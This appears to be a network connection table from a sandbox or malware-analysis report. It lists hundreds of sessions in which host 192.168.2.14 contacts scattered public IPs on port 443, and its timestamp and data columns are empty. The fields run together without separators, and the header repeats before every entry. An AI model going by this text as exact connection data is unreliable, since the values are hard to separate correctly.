                                                        18277192.168.2.143439238.49.90.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18278192.168.2.144948093.72.48.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18279192.168.2.1442906123.3.141.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18280192.168.2.145876271.49.88.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18281192.168.2.1443796188.119.105.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18282192.168.2.1456086199.134.237.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18283192.168.2.1440558146.160.152.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18284192.168.2.1460276172.199.19.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18285192.168.2.144723652.9.100.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18286192.168.2.1451516135.132.230.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18287192.168.2.1438342190.24.87.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18288192.168.2.1450894202.153.69.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18289192.168.2.1445850133.70.243.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18290192.168.2.1445374122.127.41.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18291192.168.2.144524494.228.11.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18292192.168.2.1444238139.83.110.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18293192.168.2.144093043.48.230.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18294192.168.2.1446400175.186.151.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18295192.168.2.1446152177.234.17.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18296192.168.2.1446520210.185.150.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18297192.168.2.145910671.241.71.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18298192.168.2.144089841.156.49.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18299192.168.2.1433124166.210.134.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18300192.168.2.1435074189.18.146.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18301192.168.2.1451188193.193.38.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18302192.168.2.1445740110.20.111.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18303192.168.2.145747477.246.48.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18304192.168.2.145749474.250.150.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18305192.168.2.1437614130.139.8.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18306192.168.2.1449302120.181.96.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18307192.168.2.1458084190.151.197.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18308192.168.2.144213680.213.202.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18309192.168.2.145912825.139.86.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18310192.168.2.145131286.81.22.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18311192.168.2.1439004219.47.40.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18312192.168.2.1449674199.45.89.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18313192.168.2.145986690.11.82.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18314192.168.2.14513289.69.104.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18315192.168.2.1441016220.253.6.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18316192.168.2.1456206108.208.71.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18317192.168.2.1460738121.159.118.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18318192.168.2.143669468.169.86.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18319192.168.2.145684871.250.40.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18320192.168.2.144619053.233.91.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18321192.168.2.143387070.65.254.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18322192.168.2.1455900164.1.1.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18323192.168.2.1447864212.168.122.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18324192.168.2.143874831.246.242.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18325192.168.2.143775648.220.89.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18326192.168.2.1439260186.23.11.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18327192.168.2.143420294.150.127.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18328192.168.2.1453420160.66.112.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18329192.168.2.1453274130.206.73.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18330192.168.2.1454128206.230.125.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18331192.168.2.1434480123.236.218.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18332192.168.2.1453980156.28.198.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18333192.168.2.1456044116.132.213.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18334192.168.2.1437302164.83.253.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18335192.168.2.1452570171.63.179.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18336192.168.2.1456722129.236.142.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18337192.168.2.1439724101.179.134.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18338192.168.2.1448530219.55.22.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18339192.168.2.143633627.62.32.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18340192.168.2.1437406202.36.175.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18341192.168.2.146063884.190.238.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18342192.168.2.145579684.122.59.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18343192.168.2.145710895.217.113.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18344192.168.2.143718899.19.40.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18345192.168.2.143429620.245.234.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18346192.168.2.1437374160.134.100.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18347192.168.2.143470851.43.83.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18348192.168.2.1446640204.203.228.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18349192.168.2.1449772121.150.27.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18350192.168.2.143390099.123.62.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18351192.168.2.144244043.90.44.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18352192.168.2.1434314152.45.255.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18353192.168.2.145792660.173.249.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18354192.168.2.1437368172.255.122.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18355192.168.2.143924454.118.211.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18356192.168.2.143831219.201.122.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18357192.168.2.143617496.61.200.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18358192.168.2.144170083.103.52.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18359192.168.2.1439526173.88.162.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18360192.168.2.144843850.117.109.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18361192.168.2.1444970206.28.60.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18362192.168.2.1448770182.102.107.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18363192.168.2.1454316170.224.244.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18364192.168.2.144800023.125.21.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18365192.168.2.145276051.245.27.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18366192.168.2.1437274117.6.187.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18367192.168.2.1440160184.72.234.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18368192.168.2.144801076.221.95.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18369192.168.2.143495812.49.37.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18370192.168.2.145379824.124.68.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18371192.168.2.1437462116.162.150.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18372192.168.2.1450502150.26.143.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18373192.168.2.1440518180.100.27.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18374192.168.2.1448920184.205.157.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18375192.168.2.1449010157.168.120.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18376192.168.2.145601494.215.4.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18377192.168.2.144144470.231.219.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18378192.168.2.1451970163.197.93.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18379192.168.2.1444616104.213.198.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18380192.168.2.14550161.50.146.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18381192.168.2.1442004131.47.0.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18382192.168.2.144916462.44.183.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18383192.168.2.1436022210.225.107.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18384192.168.2.1437682196.44.73.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18385192.168.2.1442552165.199.72.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18386192.168.2.145249060.52.115.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18387192.168.2.1446744182.48.57.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18388192.168.2.1451788104.136.106.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18389192.168.2.1455026133.148.35.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18390192.168.2.144364058.24.145.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18391192.168.2.145711418.166.233.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18392192.168.2.144570482.127.53.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18393192.168.2.143804039.40.189.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18394192.168.2.1450032126.85.187.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18395192.168.2.144531237.172.173.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18396192.168.2.1444588209.26.15.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18397192.168.2.1460098148.204.84.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18398192.168.2.144173281.112.170.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18399192.168.2.143650412.215.167.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18400192.168.2.1452456163.88.181.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18401192.168.2.1439070205.47.129.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18402192.168.2.145334496.22.174.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18403192.168.2.145385298.193.209.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18404192.168.2.1436116222.248.16.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18405192.168.2.1447842165.129.97.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18406192.168.2.1443550100.22.48.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18407192.168.2.1455652220.108.104.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18408192.168.2.1437466193.94.72.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18409192.168.2.1443766149.22.184.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18410192.168.2.1445924186.5.132.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18411192.168.2.1438626101.143.56.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18412192.168.2.1445112133.158.57.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18413192.168.2.1452700112.20.93.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18414192.168.2.1435672158.66.114.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18415192.168.2.1459094154.99.243.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18416192.168.2.144405689.118.111.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18417192.168.2.1440394195.117.233.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18418192.168.2.144631860.115.28.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18419192.168.2.1440814151.47.236.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18420192.168.2.143363695.194.4.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18421192.168.2.1450124100.23.19.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18422192.168.2.143752876.153.205.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18423192.168.2.144012217.100.215.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18424192.168.2.1433320178.11.123.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18425192.168.2.145711214.65.7.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18426192.168.2.1442090195.38.152.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18427192.168.2.143888265.154.173.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18428192.168.2.1439792202.31.153.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18429192.168.2.14402341.188.238.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18430192.168.2.14395525.105.44.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18431192.168.2.146098690.126.21.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18432192.168.2.145814652.137.127.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18433192.168.2.144849019.123.185.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18434192.168.2.1446814168.63.248.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18435192.168.2.145647240.201.17.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18436192.168.2.143830051.97.160.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18437192.168.2.146079260.179.10.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18438192.168.2.1440980140.144.99.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18439192.168.2.1442896126.184.243.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18440192.168.2.1451034128.143.16.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18441192.168.2.145039832.227.147.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18442192.168.2.1457040153.228.24.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18443192.168.2.143313820.205.247.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18444192.168.2.1434622221.158.152.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18445192.168.2.143481058.104.105.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18446192.168.2.1437538210.142.67.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18447192.168.2.145208012.122.223.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18448192.168.2.1438410111.19.170.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18449192.168.2.145404441.67.147.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18450192.168.2.1445070134.144.197.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18451192.168.2.1446468183.203.176.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18452192.168.2.143712680.65.4.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18453192.168.2.1460808109.70.138.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18454192.168.2.145052458.173.116.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18455192.168.2.1439980219.83.218.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18456192.168.2.145998698.16.58.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18457192.168.2.1455404146.80.20.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18458192.168.2.145093476.15.177.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18459192.168.2.1457894171.209.150.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18460192.168.2.1432944211.141.51.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18461192.168.2.144984436.229.41.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18462192.168.2.145200837.155.126.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18463192.168.2.1436982166.107.252.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18464192.168.2.14607249.69.164.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18465192.168.2.143464293.68.34.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18466192.168.2.1445888141.15.177.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18467192.168.2.1439950100.229.81.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18468192.168.2.1433444114.19.13.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18469192.168.2.1447918164.127.8.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18470192.168.2.144691440.118.173.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18471192.168.2.143519835.94.76.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18472192.168.2.1442194169.54.199.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18473192.168.2.1452450173.154.80.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18474192.168.2.1458548194.12.116.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18475192.168.2.1444952133.1.71.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18476192.168.2.1458792194.152.41.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18477192.168.2.1441208131.94.127.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18478192.168.2.1457946143.36.57.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18479192.168.2.14479009.200.24.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18480192.168.2.1439100158.40.123.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18481192.168.2.144793243.103.225.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18482192.168.2.144504041.66.88.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18483192.168.2.144314496.48.24.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18484192.168.2.1456474195.180.127.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18485192.168.2.1454132120.16.56.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18486192.168.2.145425861.67.35.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18487192.168.2.145205887.153.70.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18488192.168.2.144448296.218.229.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18489192.168.2.144161083.95.194.7443
